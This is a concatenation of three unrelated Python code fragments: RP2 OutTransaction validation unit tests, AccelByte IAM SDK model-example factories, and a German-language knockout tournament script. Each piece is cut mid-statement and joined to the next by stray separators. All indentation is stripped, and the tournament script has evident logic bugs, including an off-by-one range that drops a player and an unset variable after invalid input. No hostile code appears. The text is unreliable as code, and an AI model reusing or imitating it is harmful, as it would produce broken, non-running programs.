with self.assertRaisesRegex(RP2TypeError, "Parameter name is not a string:.*"):
OutTransaction.type_check(None, None) # type: ignore
with self.assertRaisesRegex(RP2TypeError, "Parameter 'my_instance' is not of type OutTransaction:.*"):
OutTransaction.type_check("my_instance", None) # type: ignore
with self.assertRaisesRegex(RP2TypeError, "Parameter 'my_instance' is not of type OutTransaction: IntraTransaction"):
OutTransaction.type_check(
"my_instance",
IntraTransaction(
self._configuration,
"2021-01-12T11:51:38Z",
"B1",
"BlockFi",
"Bob",
"Coinbase",
"Alice",
RP2Decimal("10000"),
RP2Decimal("1"),
RP2Decimal("1"),
internal_id=45,
),
)
with self.assertRaisesRegex(RP2TypeError, "Parameter 'configuration' is not of type Configuration: .*"):
# Bad configuration
OutTransaction(
(1, 2, 3), # type: ignore
"6/1/2020 3:59:59 -04:00",
"B1",
"Coinbase Pro",
"Bob",
"GIFT",
RP2Decimal("900.9"),
RP2Decimal("2.2"),
RP2Decimal("0"),
internal_id=38,
)
with self.assertRaisesRegex(RP2TypeError, "Parameter 'configuration' is not of type Configuration: .*"):
# Bad configuration
OutTransaction(
None, # type: ignore
"6/1/2020 3:59:59 -04:00",
"B1",
"Coinbase Pro",
"Bob",
"SELL",
RP2Decimal("900.9"),
RP2Decimal("2.2"),
RP2Decimal("0"),
internal_id=38,
)
with self.assertRaisesRegex(RP2TypeError, "Parameter 'internal_id' has non-integer value .*"):
# Bad internal_id
OutTransaction(
self._configuration,
"6/1/2020 3:59:59 -04:00",
"B1",
"Coinbase Pro",
"Bob",
"SELL",
RP2Decimal("900.9"),
RP2Decimal("2.2"),
RP2Decimal("0"),
internal_id=(1, 2, 3), # type: ignore
)
with self.assertRaisesRegex(RP2TypeError, "Parameter 'timestamp' has non-string value .*"):
# Bad timestamp
OutTransaction(
self._configuration,
None, # type: ignore
"B1",
"Coinbase Pro",
"Bob",
"gIfT",
RP2Decimal("900.9"),
RP2Decimal("2.2"),
RP2Decimal("0"),
internal_id=38,
)
with self.assertRaisesRegex(RP2ValueError, "Parameter 'timestamp' value has no timezone info: .*"):
# Bad timestamp
OutTransaction(
self._configuration,
"6/1/2020 3:59:59",
"B1",
"Coinbase Pro",
"Bob",
"selL",
RP2Decimal("900.9"),
RP2Decimal("2.2"),
RP2Decimal("0"),
internal_id=38,
)
with self.assertRaisesRegex(RP2TypeError, "Parameter 'timestamp' has non-string value .*"):
# Bad timestamp
OutTransaction(
self._configuration,
(1, 2, 3), # type: ignore
"B1",
"Coinbase Pro",
"Bob",
"GIFT",
RP2Decimal("900.9"),
RP2Decimal("2.2"),
RP2Decimal("0"),
internal_id=38,
)
with self.assertRaisesRegex(RP2ValueError, "Parameter 'asset' value is not known: .*"):
# Bad asset
OutTransaction(
self._configuration,
"6/1/2020 3:59:59 -04:00",
"YYY",
"Coinbase Pro",
"Bob",
"SELL",
RP2Decimal("900.9"),
RP2Decimal("2.2"),
RP2Decimal("0"),
internal_id=38,
)
with self.assertRaisesRegex(RP2TypeError, "Parameter 'asset' has non-string value .*"):
# Bad asset
OutTransaction(
self._configuration,
"6/1/2020 3:59:59 -04:00",
None, # type: ignore
"Coinbase Pro",
"Bob",
"SELL",
RP2Decimal("900.9"),
RP2Decimal("2.2"),
RP2Decimal("0"),
internal_id=38,
)
with self.assertRaisesRegex(RP2ValueError, "Parameter 'exchange' value is not known: .*"):
# Bad exchange
OutTransaction(
self._configuration,
"6/1/2020 3:59:59 -04:00",
"B1",
"CoinbasE Pro",
"Bob",
"SELL",
RP2Decimal("900.9"),
RP2Decimal("2.2"),
RP2Decimal("0"),
internal_id=38,
)
with self.assertRaisesRegex(RP2TypeError, "Parameter 'exchange' has non-string value .*"):
# Bad exchange
OutTransaction(
self._configuration,
"6/1/2020 3:59:59 -04:00",
"B1",
None, # type: ignore
"Bob",
"SELL",
RP2Decimal("900.9"),
RP2Decimal("2.2"),
RP2Decimal("0"),
internal_id=38,
)
with self.assertRaisesRegex(RP2ValueError, "Parameter 'holder' value is not known: .*"):
# Bad holder
OutTransaction(
self._configuration,
"6/1/2020 3:59:59 -04:00",
"B1",
"Coinbase Pro",
"foobar",
"SELL",
RP2Decimal("900.9"),
RP2Decimal("2.2"),
RP2Decimal("0"),
internal_id=38,
)
with self.assertRaisesRegex(RP2TypeError, "Parameter 'holder' has non-string value .*"):
# Bad holder
OutTransaction(
self._configuration,
"6/1/2020 3:59:59 -04:00",
"B1",
"Coinbase Pro",
None, # type: ignore
"SELL",
RP2Decimal("900.9"),
RP2Decimal("2.2"),
RP2Decimal("0"),
internal_id=38,
)
with self.assertRaisesRegex(RP2ValueError, ".*OutTransaction .*, id.*invalid transaction type .*"):
# Bad transaction type
OutTransaction(
self._configuration,
"6/1/2020 3:59:59 -04:00",
"B1",
"Coinbase Pro",
"Bob",
"Buy",
RP2Decimal("900.9"),
RP2Decimal("2.2"),
RP2Decimal("0"),
internal_id=38,
)
with self.assertRaisesRegex(RP2ValueError, ".*OutTransaction .*, id.*invalid transaction type .*"):
# Bad transaction type
OutTransaction(
self._configuration,
"6/1/2020 3:59:59 -04:00",
"B1",
"Coinbase Pro",
"Bob",
"iNteResT",
RP2Decimal("900.9"),
RP2Decimal("2.2"),
RP2Decimal("0"),
internal_id=38,
)
with self.assertRaisesRegex(RP2ValueError, "Parameter .* has invalid transaction type value: .*"):
# Bad transaction type
OutTransaction(
self._configuration,
"6/1/2020 3:59:59 -04:00",
"B1",
"Coinbase Pro",
"Bob",
"BEND",
RP2Decimal("900.9"),
RP2Decimal("2.2"),
RP2Decimal("0"),
internal_id=38,
)
with self.assertRaisesRegex(RP2TypeError, "Parameter .* has non-string value .*"):
# Bad transaction type
OutTransaction(
self._configuration,
"6/1/2020 3:59:59 -04:00",
"B1",
"Coinbase Pro",
"Bob",
None, # type: ignore
RP2Decimal("900.9"),
RP2Decimal("2.2"),
RP2Decimal("0"),
internal_id=38,
)
with self.assertRaisesRegex(RP2ValueError, "OutTransaction .*, id.*parameter 'spot_price' cannot be 0"):
# Bad spot price
OutTransaction(
self._configuration,
"6/1/2020 3:59:59 -04:00",
"B1",
"Coinbase Pro",
"Bob",
"SELL",
RP2Decimal("0"),
RP2Decimal("2.2"),
RP2Decimal("0"),
internal_id=38,
)
with self.assertRaisesRegex(RP2ValueError, "Parameter 'spot_price' has non-positive value .*"):
# Bad spot price
OutTransaction(
self._configuration,
"6/1/2020 3:59:59 -04:00",
"B1",
"Coinbase Pro",
"Bob",
"SELL",
RP2Decimal("-900.9"),
RP2Decimal("2.2"),
RP2Decimal("0"),
internal_id=38,
)
with self.assertRaisesRegex(RP2TypeError, "Parameter 'spot_price' has non-RP2Decimal value ,*"):
# Bad spot price
OutTransaction(
self._configuration,
"6/1/2020 3:59:59 -04:00",
"B1",
"Coinbase Pro",
"Bob",
"GIFT",
None, # type: ignore
RP2Decimal("2.2"),
RP2Decimal("0"),
internal_id=38,
)
with self.assertRaisesRegex(RP2ValueError, "Parameter 'crypto_out_no_fee' has zero value"):
# Bad crypto out no fee
OutTransaction(
self._configuration,
"6/1/2020 3:59:59 -04:00",
"B1",
"Coinbase Pro",
"Bob",
"GIFT",
RP2Decimal("900.9"),
RP2Decimal("0"),
RP2Decimal("0"),
internal_id=38,
)
with self.assertRaisesRegex(RP2ValueError, "Parameter 'crypto_out_no_fee' has non-positive value .*"):
# Bad crypto out no fee
OutTransaction(
self._configuration,
"6/1/2020 3:59:59 -04:00",
"B1",
"Coinbase Pro",
"Bob",
"SELL",
RP2Decimal("900.9"),
RP2Decimal("-2.2"),
RP2Decimal("0"),
internal_id=38,
)
with self.assertRaisesRegex(RP2TypeError, "Parameter 'crypto_out_no_fee' has non-RP2Decimal value .*"):
# Bad crypto out no fee
OutTransaction(
self._configuration,
"6/1/2020 3:59:59 -04:00",
"B1",
"Coinbase Pro",
"Bob",
"SELL",
RP2Decimal("900.9"),
None, # type: ignore
RP2Decimal("0"),
internal_id=38,
)
with self.assertRaisesRegex(RP2ValueError, "fee-typed transaction has non-zero 'crypto_out_no_fee'"):
# Bad crypto out no fee
OutTransaction(
self._configuration,
"6/1/2020 3:59:59 -04:00",
"B1",
"Coinbase Pro",
"Bob",
"FEE",
RP2Decimal("900.9"),
RP2Decimal("10"),
RP2Decimal("0"),
internal_id=38,
)
with self.assertRaisesRegex(RP2ValueError, "Parameter 'crypto_fee' has non-positive value .*"):
# Bad crypto fee
OutTransaction(
self._configuration,
"6/1/2020 3:59:59 -04:00",
"B1",
"Coinbase Pro",
"Bob",
"SELL",
RP2Decimal("900.9"),
RP2Decimal("2.2"),
RP2Decimal("-0.1"),
internal_id=38,
)
with self.assertRaisesRegex(RP2TypeError, "Parameter 'crypto_fee' has non-RP2Decimal value .*"):
# Bad crypto fee
OutTransaction(
self._configuration,
"6/1/2020 3:59:59 -04:00",
"B1",
"Coinbase Pro",
"Bob",
"SELL",
RP2Decimal("900.9"),
RP2Decimal("2.2"),
"foobar", # type: ignore
internal_id=38,
)
with self.assertRaisesRegex(RP2ValueError, "Parameter 'fiat_out_no_fee' has non-positive value .*"):
# Bad fiat_out_no_fee
OutTransaction(
self._configuration,
"6/1/2020 3:59:59 -04:00",
"B1",
"Coinbase Pro",
"Bob",
"SELL",
RP2Decimal("900.9"),
RP2Decimal("2.2"),
RP2Decimal("0"),
fiat_out_no_fee=RP2Decimal("-0.1"),
internal_id=38,
)
with self.assertRaisesRegex(RP2TypeError, "Parameter 'fiat_out_no_fee' has non-RP2Decimal value .*"):
# Bad fiat_out_no_fee
OutTransaction(
self._configuration,
"6/1/2020 3:59:59 -04:00",
"B1",
"Coinbase Pro",
"Bob",
"SELL",
RP2Decimal("900.9"),
RP2Decimal("2.2"),
RP2Decimal("0"),
fiat_out_no_fee="foobar", # type: ignore
internal_id=38,
)
with self.assertRaisesRegex(RP2ValueError, "Parameter 'fiat_fee' has non-positive value | |
# Copyright (c) 2021 AccelByte Inc. All Rights Reserved.
# This is licensed software from AccelByte Inc, for limitations
# and restrictions contact your company contract manager.
#
# Code generated. DO NOT EDIT!
# template file: justice_py_sdk_codegen/__main__.py
# justice-iam-service (5.10.1)
# pylint: disable=duplicate-code
# pylint: disable=line-too-long
# pylint: disable=missing-function-docstring
# pylint: disable=missing-module-docstring
# pylint: disable=too-many-arguments
# pylint: disable=too-many-branches
# pylint: disable=too-many-instance-attributes
# pylint: disable=too-many-lines
# pylint: disable=too-many-locals
# pylint: disable=too-many-public-methods
# pylint: disable=too-many-return-statements
# pylint: disable=too-many-statements
# pylint: disable=unused-import
from .utils import randomize
from ..api.iam.models import AccountCreateTestUserRequestV4
from ..api.iam.models import AccountCreateUserRequestV4
from ..api.iam.models import AccountCreateUserResponseV4
from ..api.iam.models import AccountUpgradeHeadlessAccountRequestV4
from ..api.iam.models import AccountUpgradeHeadlessAccountWithVerificationCodeRequestV4
from ..api.iam.models import AccountUserActiveBanResponseV4
from ..api.iam.models import AccountUserPermissionsResponseV4
from ..api.iam.models import AccountUserResponseV4
from ..api.iam.models import AccountcommonBan
from ..api.iam.models import AccountcommonBanReason
from ..api.iam.models import AccountcommonBanReasonV3
from ..api.iam.models import AccountcommonBanReasons
from ..api.iam.models import AccountcommonBanReasonsV3
from ..api.iam.models import AccountcommonBanV3
from ..api.iam.models import AccountcommonBannedByV3
from ..api.iam.models import AccountcommonBans
from ..api.iam.models import AccountcommonBansV3
from ..api.iam.models import AccountcommonClientPermission
from ..api.iam.models import AccountcommonClientPermissionV3
from ..api.iam.models import AccountcommonClientPermissions
from ..api.iam.models import AccountcommonClientPermissionsV3
from ..api.iam.models import AccountcommonConflictedUserPlatformAccounts
from ..api.iam.models import AccountcommonCountryAgeRestriction
from ..api.iam.models import AccountcommonDescription
from ..api.iam.models import AccountcommonDistinctLinkedPlatformV3
from ..api.iam.models import AccountcommonDistinctPlatformResponseV3
from ..api.iam.models import AccountcommonInputValidationDescription
from ..api.iam.models import AccountcommonJWTBanV3
from ..api.iam.models import AccountcommonListUsersWithPlatformAccountsResponse
from ..api.iam.models import AccountcommonNamespaceRole
from ..api.iam.models import AccountcommonNetflixCertificates
from ..api.iam.models import AccountcommonPagination
from ..api.iam.models import AccountcommonPaginationV3
from ..api.iam.models import AccountcommonPermission
from ..api.iam.models import AccountcommonPermissionV3
from ..api.iam.models import AccountcommonPermissions
from ..api.iam.models import AccountcommonPermissionsV3
from ..api.iam.models import AccountcommonPlatformAccount
from ..api.iam.models import AccountcommonRegisteredDomain
from ..api.iam.models import AccountcommonRole
from ..api.iam.models import AccountcommonRoleManager
from ..api.iam.models import AccountcommonRoleManagerV3
from ..api.iam.models import AccountcommonRoleMember
from ..api.iam.models import AccountcommonRoleMemberV3
from ..api.iam.models import AccountcommonRoleV3
from ..api.iam.models import AccountcommonSimpleUserPlatformInfoV3
from ..api.iam.models import AccountcommonUserLinkedPlatform
from ..api.iam.models import AccountcommonUserLinkedPlatformV3
from ..api.iam.models import AccountcommonUserLinkedPlatformsResponseV3
from ..api.iam.models import AccountcommonUserPlatformInfo
from ..api.iam.models import AccountcommonUserPlatforms
from ..api.iam.models import AccountcommonUserSearchByPlatformIDResult
from ..api.iam.models import AccountcommonUserSearchResult
from ..api.iam.models import AccountcommonUserWithLinkedPlatformAccounts
from ..api.iam.models import AccountcommonUserWithPlatformAccounts
from ..api.iam.models import BannedBy
from ..api.iam.models import BloomFilterJSON
from ..api.iam.models import ClientmodelClientCreateRequest
from ..api.iam.models import ClientmodelClientCreationResponse
from ..api.iam.models import ClientmodelClientCreationV3Request
from ..api.iam.models import ClientmodelClientResponse
from ..api.iam.models import ClientmodelClientUpdateRequest
from ..api.iam.models import ClientmodelClientUpdateSecretRequest
from ..api.iam.models import ClientmodelClientUpdateV3Request
from ..api.iam.models import ClientmodelClientV3Response
from ..api.iam.models import ClientmodelClientsV3Response
from ..api.iam.models import LegalAcceptedPoliciesRequest
from ..api.iam.models import ModelAddUserRoleV4Request
from ..api.iam.models import ModelAgeRestrictionRequest
from ..api.iam.models import ModelAgeRestrictionRequestV3
from ..api.iam.models import ModelAgeRestrictionResponse
from ..api.iam.models import ModelAgeRestrictionResponseV3
from ..api.iam.models import ModelAssignUserV4Request
from ..api.iam.models import ModelAssignedUserV4Response
from ..api.iam.models import ModelAuthenticatorKeyResponseV4
from ..api.iam.models import ModelBackupCodesResponseV4
from ..api.iam.models import ModelBanCreateRequest
from ..api.iam.models import ModelBanUpdateRequest
from ..api.iam.models import ModelCheckValidUserIDRequestV4
from ..api.iam.models import ModelCountry
from ..api.iam.models import ModelCountryAgeRestrictionRequest
from ..api.iam.models import ModelCountryAgeRestrictionV3Request
from ..api.iam.models import ModelCountryV3Response
from ..api.iam.models import ModelCreateJusticeUserResponse
from ..api.iam.models import ModelDisableUserRequest
from ..api.iam.models import ModelEmailUpdateRequestV4
from ..api.iam.models import ModelEnabledFactorsResponseV4
from ..api.iam.models import ModelForgotPasswordRequestV3
from ..api.iam.models import ModelGetAdminUsersResponse
from ..api.iam.models import ModelGetPublisherUserResponse
from ..api.iam.models import ModelGetUserBanV3Response
from ..api.iam.models import ModelGetUserJusticePlatformAccountResponse
from ..api.iam.models import ModelGetUserMapping
from ..api.iam.models import ModelGetUsersResponseWithPaginationV3
from ..api.iam.models import ModelInputValidationData
from ..api.iam.models import ModelInputValidationDataPublic
from ..api.iam.models import ModelInputValidationUpdatePayload
from ..api.iam.models import ModelInputValidationsPublicResponse
from ..api.iam.models import ModelInputValidationsResponse
from ..api.iam.models import ModelInviteUserRequestV3
from ..api.iam.models import ModelInviteUserRequestV4
from ..api.iam.models import ModelInviteUserResponseV3
from ..api.iam.models import ModelLinkPlatformAccountRequest
from ..api.iam.models import ModelLinkPlatformAccountWithProgressionRequest
from ..api.iam.models import ModelLinkRequest
from ..api.iam.models import ModelListAssignedUsersV4Response
from ..api.iam.models import ModelListBulkUserResponse
from ..api.iam.models import ModelListEmailAddressRequest
from ..api.iam.models import ModelListRoleV4Response
from ..api.iam.models import ModelListUserInformationResult
from ..api.iam.models import ModelListUserResponseV3
from ..api.iam.models import ModelListUserRolesV4Response
from ..api.iam.models import ModelListValidUserIDResponseV4
from ..api.iam.models import ModelLoginHistoriesResponse
from ..api.iam.models import ModelNamespaceRoleRequest
from ..api.iam.models import ModelPermissionDeleteRequest
from ..api.iam.models import ModelPlatformDomainDeleteRequest
from ..api.iam.models import ModelPlatformDomainResponse
from ..api.iam.models import ModelPlatformDomainUpdateRequest
from ..api.iam.models import ModelPlatformUserIDRequest
from ..api.iam.models import ModelPlatformUserInformation
from ..api.iam.models import ModelPublicThirdPartyPlatformInfo
from ..api.iam.models import ModelPublicUserInformationResponseV3
from ..api.iam.models import ModelPublicUserInformationV3
from ..api.iam.models import ModelPublicUserResponse
from ..api.iam.models import ModelPublicUserResponseV3
from ..api.iam.models import ModelPublicUsersResponse
from ..api.iam.models import ModelRemoveUserRoleV4Request
from ..api.iam.models import ModelResetPasswordRequest
from ..api.iam.models import ModelResetPasswordRequestV3
from ..api.iam.models import ModelRevokeUserV4Request
from ..api.iam.models import ModelRoleAdminStatusResponse
from ..api.iam.models import ModelRoleAdminStatusResponseV3
from ..api.iam.models import ModelRoleCreateRequest
from ..api.iam.models import ModelRoleCreateV3Request
from ..api.iam.models import ModelRoleManagersRequest
from ..api.iam.models import ModelRoleManagersRequestV3
from ..api.iam.models import ModelRoleManagersResponse
from ..api.iam.models import ModelRoleManagersResponsesV3
from ..api.iam.models import ModelRoleMembersRequest
from ..api.iam.models import ModelRoleMembersRequestV3
from ..api.iam.models import ModelRoleMembersResponse
from ..api.iam.models import ModelRoleMembersResponseV3
from ..api.iam.models import ModelRoleNamesResponseV3
from ..api.iam.models import ModelRoleResponse
from ..api.iam.models import ModelRoleResponseV3
from ..api.iam.models import ModelRoleResponseWithManagers
from ..api.iam.models import ModelRoleResponseWithManagersAndPaginationV3
from ..api.iam.models import ModelRoleResponseWithManagersV3
from ..api.iam.models import ModelRoleUpdateRequest
from ..api.iam.models import ModelRoleUpdateRequestV3
from ..api.iam.models import ModelRoleV4Request
from ..api.iam.models import ModelRoleV4Response
from ..api.iam.models import ModelSSOPlatformCredentialRequest
from ..api.iam.models import ModelSSOPlatformCredentialResponse
from ..api.iam.models import ModelSearchUsersByPlatformIDResponse
from ..api.iam.models import ModelSearchUsersResponse
from ..api.iam.models import ModelSearchUsersResponseWithPaginationV3
from ..api.iam.models import ModelSendRegisterVerificationCodeRequest
from ..api.iam.models import ModelSendVerificationCodeRequest
from ..api.iam.models import ModelSendVerificationCodeRequestV3
from ..api.iam.models import ModelThirdPartyLoginPlatformCredentialRequest
from ..api.iam.models import ModelThirdPartyLoginPlatformCredentialResponse
from ..api.iam.models import ModelUnlinkUserPlatformRequest
from ..api.iam.models import ModelUpdatePermissionScheduleRequest
from ..api.iam.models import ModelUpdateUserDeletionStatusRequest
from ..api.iam.models import ModelUpdateUserStatusRequest
from ..api.iam.models import ModelUpgradeHeadlessAccountRequest
from ..api.iam.models import ModelUpgradeHeadlessAccountV3Request
from ..api.iam.models import ModelUpgradeHeadlessAccountWithVerificationCodeRequest
from ..api.iam.models import ModelUpgradeHeadlessAccountWithVerificationCodeRequestV3
from ..api.iam.models import ModelUserActiveBanResponse
from ..api.iam.models import ModelUserActiveBanResponseV3
from ..api.iam.models import ModelUserBanResponse
from ..api.iam.models import ModelUserBanResponseV3
from ..api.iam.models import ModelUserBaseInfo
from ..api.iam.models import ModelUserCreateFromInvitationRequestV3
from ..api.iam.models import ModelUserCreateFromInvitationRequestV4
from ..api.iam.models import ModelUserCreateRequest
from ..api.iam.models import ModelUserCreateRequestV3
from ..api.iam.models import ModelUserCreateResponse
from ..api.iam.models import ModelUserCreateResponseV3
from ..api.iam.models import ModelUserDeletionStatusResponse
from ..api.iam.models import ModelUserIDsRequest
from ..api.iam.models import ModelUserInfoResponse
from ..api.iam.models import ModelUserInformation
from ..api.iam.models import ModelUserInvitationV3
from ..api.iam.models import ModelUserLoginHistoryResponse
from ..api.iam.models import ModelUserPasswordUpdateRequest
from ..api.iam.models import ModelUserPasswordUpdateV3Request
from ..api.iam.models import ModelUserPermissionsResponseV3
from ..api.iam.models import ModelUserResponse
from ..api.iam.models import ModelUserResponseV3
from ..api.iam.models import ModelUserRolesV4Response
from ..api.iam.models import ModelUserUpdateRequest
from ..api.iam.models import ModelUserUpdateRequestV3
from ..api.iam.models import ModelUserVerificationRequest
from ..api.iam.models import ModelUserVerificationRequestV3
from ..api.iam.models import ModelValidUserIDResponseV4
from ..api.iam.models import ModelValidationDetail
from ..api.iam.models import ModelValidationDetailPublic
from ..api.iam.models import ModelVerificationCodeResponse
from ..api.iam.models import ModelVerifyRegistrationCode
from ..api.iam.models import ModelWebLinkingResponse
from ..api.iam.models import OauthapiRevocationList
from ..api.iam.models import OauthcommonJWKKey
from ..api.iam.models import OauthcommonJWKSet
from ..api.iam.models import OauthcommonUserRevocationListRecord
from ..api.iam.models import OauthmodelCountryLocationResponse
from ..api.iam.models import OauthmodelErrorResponse
from ..api.iam.models import OauthmodelTokenIntrospectResponse
from ..api.iam.models import OauthmodelTokenResponse
from ..api.iam.models import OauthmodelTokenResponseV3
from ..api.iam.models import OauthmodelTokenThirdPartyResponse
from ..api.iam.models import RestErrorResponse
from ..api.iam.models import RestapiErrorResponse
from ..api.iam.models import Validation
from ..api.iam.models import ValidationDescription
def create_account_create_test_user_request_v4_example() -> AccountCreateTestUserRequestV4:
instance = AccountCreateTestUserRequestV4()
instance.auth_type = randomize()
instance.country = randomize("country")
instance.date_of_birth = randomize()
instance.display_name = randomize("slug")
instance.email_address = randomize("email")
instance.password = randomize("password")
instance.password_md5_sum = randomize()
instance.username = randomize("slug")
instance.verified = randomize("bool")
instance.accepted_policies = [create_legal_accepted_policies_request_example()]
return instance
def create_account_create_user_request_v4_example() -> AccountCreateUserRequestV4:
instance = AccountCreateUserRequestV4()
instance.auth_type = randomize()
instance.code = randomize()
instance.country = randomize("country")
instance.display_name = randomize("slug")
instance.email_address = randomize("email")
instance.password = randomize("password")
instance.password_md5_sum = randomize()
instance.reach_minimum_age = randomize("bool")
instance.username = randomize("slug")
instance.accepted_policies = [create_legal_accepted_policies_request_example()]
instance.date_of_birth = randomize()
return instance
def create_account_create_user_response_v4_example() -> AccountCreateUserResponseV4:
instance = AccountCreateUserResponseV4()
instance.auth_type = randomize()
instance.country = randomize("country")
instance.date_of_birth = randomize("adult_birthdate")
instance.display_name = randomize("slug")
instance.email_address = randomize("email")
instance.namespace = randomize("slug")
instance.user_id = randomize("uid")
instance.username = randomize("slug")
return instance
def create_account_upgrade_headless_account_request_v4_example() -> AccountUpgradeHeadlessAccountRequestV4:
instance = AccountUpgradeHeadlessAccountRequestV4()
instance.email_address = randomize("email")
instance.password = randomize("password")
instance.username = randomize("slug")
return instance
def create_account_upgrade_headless_account_with_verification_code_request_v4_example() -> AccountUpgradeHeadlessAccountWithVerificationCodeRequestV4:
instance = AccountUpgradeHeadlessAccountWithVerificationCodeRequestV4()
instance.code = randomize()
instance.email_address = randomize("email")
instance.password = randomize("password")
instance.reach_minimum_age = randomize("bool")
instance.username = randomize("slug")
instance.validate_only = randomize("bool")
instance.country = randomize("country")
instance.date_of_birth = randomize()
instance.display_name = randomize("slug")
return instance
def create_account_user_active_ban_response_v4_example() -> AccountUserActiveBanResponseV4:
instance = AccountUserActiveBanResponseV4()
instance.ban = randomize()
instance.ban_id = randomize()
instance.end_date = randomize("date")
return instance
def create_account_user_permissions_response_v4_example() -> AccountUserPermissionsResponseV4:
instance = AccountUserPermissionsResponseV4()
instance.action = randomize("int", min_val=1, max_val=1000)
instance.resource = randomize()
instance.sched_action = randomize("int", min_val=1, max_val=1000)
instance.sched_cron = randomize()
instance.sched_range = [randomize()]
return instance
def create_account_user_response_v4_example() -> AccountUserResponseV4:
instance = AccountUserResponseV4()
instance.auth_type = randomize()
instance.bans = [create_account_user_active_ban_response_v4_example()]
instance.country = randomize("country")
instance.created_at = randomize("date")
instance.date_of_birth = randomize("adult_birthdate")
instance.deletion_status = randomize("bool")
instance.display_name = randomize("slug")
instance.email_address = randomize("email")
instance.email_verified = randomize("bool")
instance.enabled = randomize("bool")
instance.last_date_of_birth_changed_time = randomize("date")
instance.last_enabled_changed_time = randomize("date")
instance.namespace = randomize("slug")
instance.old_email_address = randomize()
instance.permissions = [create_account_user_permissions_response_v4_example()]
instance.phone_verified = randomize("bool")
instance.roles = [randomize()]
instance.user_id = randomize("uid")
instance.new_email_address = randomize()
instance.phone_number = randomize()
instance.platform_id = randomize()
instance.platform_user_id = randomize()
instance.username = randomize("slug")
return instance
def create_accountcommon_ban_example() -> AccountcommonBan:
instance = AccountcommonBan()
instance.ban = randomize()
instance.description = randomize()
return instance
def create_accountcommon_ban_reason_example() -> AccountcommonBanReason:
instance = AccountcommonBanReason()
instance.description = randomize()
instance.reason = randomize()
return instance
def create_accountcommon_ban_reason_v3_example() -> AccountcommonBanReasonV3:
instance = AccountcommonBanReasonV3()
instance.description = randomize()
instance.reason = randomize()
return instance
def create_accountcommon_ban_reasons_example() -> AccountcommonBanReasons:
instance = AccountcommonBanReasons()
instance.reasons = [create_accountcommon_ban_reason_example()]
return instance
def create_accountcommon_ban_reasons_v3_example() -> AccountcommonBanReasonsV3:
instance = AccountcommonBanReasonsV3()
instance.reasons = [create_accountcommon_ban_reason_v3_example()]
return instance
def create_accountcommon_ban_v3_example() -> AccountcommonBanV3:
instance = AccountcommonBanV3()
instance.ban = randomize()
instance.type_ = randomize()
instance.description = randomize()
instance.descriptions = create_accountcommon_description_example()
return instance
def create_accountcommon_banned_by_v3_example() -> AccountcommonBannedByV3:
instance = AccountcommonBannedByV3()
instance.display_name = randomize("slug")
instance.user_id = randomize("uid")
return instance
def create_accountcommon_bans_example() -> AccountcommonBans:
instance = AccountcommonBans()
instance.bans = [create_accountcommon_ban_example()]
return instance
def create_accountcommon_bans_v3_example() -> AccountcommonBansV3:
instance = AccountcommonBansV3()
instance.bans = [create_accountcommon_ban_v3_example()]
return instance
def create_accountcommon_client_permission_example() -> AccountcommonClientPermission:
instance = AccountcommonClientPermission()
instance.action = randomize("int", min_val=1, max_val=1000)
instance.resource = randomize()
return instance
def create_accountcommon_client_permission_v3_example() -> AccountcommonClientPermissionV3:
instance = AccountcommonClientPermissionV3()
instance.action = randomize("int", min_val=1, max_val=1000)
instance.resource = randomize()
return instance
def create_accountcommon_client_permissions_example() -> AccountcommonClientPermissions:
instance = AccountcommonClientPermissions()
instance.permissions = [create_accountcommon_client_permission_example()]
return instance
def create_accountcommon_client_permissions_v3_example() -> AccountcommonClientPermissionsV3:
instance = AccountcommonClientPermissionsV3()
instance.permissions = [create_accountcommon_client_permission_v3_example()]
return instance
def create_accountcommon_conflicted_user_platform_accounts_example() -> AccountcommonConflictedUserPlatformAccounts:
instance = AccountcommonConflictedUserPlatformAccounts()
instance.platform_user_id = randomize()
instance.publisher_accounts = [create_accountcommon_user_with_linked_platform_accounts_example()]
return instance
def create_accountcommon_country_age_restriction_example() -> AccountcommonCountryAgeRestriction:
instance = AccountcommonCountryAgeRestriction()
instance.age_restriction = randomize("int", min_val=1, max_val=1000)
instance.country_code = randomize()
instance.country_name = randomize()
instance.enable = randomize("bool")
return instance
def create_accountcommon_description_example() -> AccountcommonDescription:
instance = AccountcommonDescription()
instance.en_us = randomize()
instance.zh_cn = randomize()
return instance
def create_accountcommon_distinct_linked_platform_v3_example() -> AccountcommonDistinctLinkedPlatformV3:
instance = AccountcommonDistinctLinkedPlatformV3()
instance.details = [create_accountcommon_simple_user_platform_info_v3_example()]
instance.linked_at = randomize()
instance.platform_name = randomize()
instance.platform_user_id = randomize()
return instance
def create_accountcommon_distinct_platform_response_v3_example() -> AccountcommonDistinctPlatformResponseV3:
instance = AccountcommonDistinctPlatformResponseV3()
instance.platforms = [create_accountcommon_distinct_linked_platform_v3_example()]
return instance
def create_accountcommon_input_validation_description_example() -> AccountcommonInputValidationDescription:
instance = AccountcommonInputValidationDescription()
instance.language = randomize()
instance.message = [randomize()]
return instance
def create_accountcommon_jwt_ban_v3_example() -> AccountcommonJWTBanV3:
instance = AccountcommonJWTBanV3()
instance.ban = | |
from glob import glob
import random
from statistics import mode
import sys
def ko(dataarray, name):
#winnerlist = []
playeramount = int(dataarray.pop(0))
playerlist = dataarray
if playeramount % 2 == 1:
print("Deine Spielerzahl ist leider ungerade somit geht das KO System nicht auf")
ask = input("Es wird nun ein Spieler zufällig disqualifiziert\n Falls du das nicht willst schreibe (n) \nIn dem Fall wenn du n eingibst musst du entweder vor dem Neustart deine Spieleranzahl in eine gerade Zahl umwandeln oder das Liga System verwenden.")
if ask == "n" or ask == "N":
sys.exit(0)
else:
rdmn = random.randint(0,playeramount-1)
playerlist.pop(rdmn)
playeramount = playeramount - 1
loop = True
print(playerlist[0])
while loop:
try:
tournament_schedule = int(input("Welchen Tunierplan möchtest du benutzen durchnumerriert nach der Ordnung der Textdatei(1), zufällig (2), manuell (3)"))
except ValueError:
print("Dein Input leider keine ganze Zahl")
if tournament_schedule == 1:
loop = False
round1plan = {}
playeramount_half = int(playeramount / 2)
for i in range (1, playeramount_half + 1):
print(i)
if i ==1:
round1plan["group{0}".format(i)] = 0, 1
else:
x = i-1
x = x *2
round1plan["group{0}".format(i)] = x, x+1
print(round1plan)
print("Der Turierplan wird nach der Ordnung der Textdatei erstellt")
elif tournament_schedule == 2:
loop = False
round1plan = {}
playeramount_half = int(playeramount / 2)
check = []
player_order = []
for i in range (0,playeramount-1):
check.append(i)
print(check)
while len(check) != 0:
random_number = random.randint(0,playeramount-1)
try:
check.remove(random_number)
except:
continue
player_order.append(random_number)
print(player_order)
for i in range (0,playeramount_half):
x = i-1
x = x *2
